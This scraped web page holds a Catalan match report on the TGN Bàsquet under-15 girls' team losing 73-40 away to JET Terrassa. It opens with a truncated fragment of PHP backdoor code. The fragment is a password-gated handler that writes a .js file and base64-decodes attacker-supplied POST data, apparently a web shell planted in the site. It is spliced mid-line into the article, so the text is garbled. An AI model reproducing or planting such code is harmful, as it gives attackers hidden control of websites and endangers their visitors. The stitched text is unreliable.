function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Derrota contundent a domicili -

Derrota contundent a domicili

Updated: setembre 29, 2022

Segon partit de l’Infantil Femení 09A de la temporada, el primer a domicili i primera derrota del conjunt lila (73-40). Després d’una jornada de descans i passar el meravellós Torneig de Santa Tecla. Es va disputar el matx contra un dels equips capdavanters del grup. La JET de Terrassa és un equip físicament fort que aplica una defensa intensa, i com la majoria dels equips de Barcelona amb la incorporació d’alguna jugadora per a aquesta nova temporada.

L’inici de partit va ser realment bo de les noies del TGN Bàsquet, amb un primer parcial de 3-12 al minut 5′ (13-17) al final del 1r quart. Però de nou, aquestes badades defensives per falta de concentració ens van fer molt de mal a la segona part. Van entrar els nervis i de nou les contínues pèrdues de pilota ens van portar a anotar només 4 punts en el segon període (23-4 2n parcial). Ja no vam saber reconduir el partit. La derrota en si, també mostra les nostres debilitats ja que potser és el primer partit en aquests dos anys amb el cos tècnic actual, on es va veure les jugadores abaixar els braços. Un equip que sempre ha lluitat i ha estat a totes. Fallar 25 tirs lliures i concedir que tinguessin el doble de tirs de 2 que dóna una idea del partit. Toca seguir entrenant, la competició no s’atura!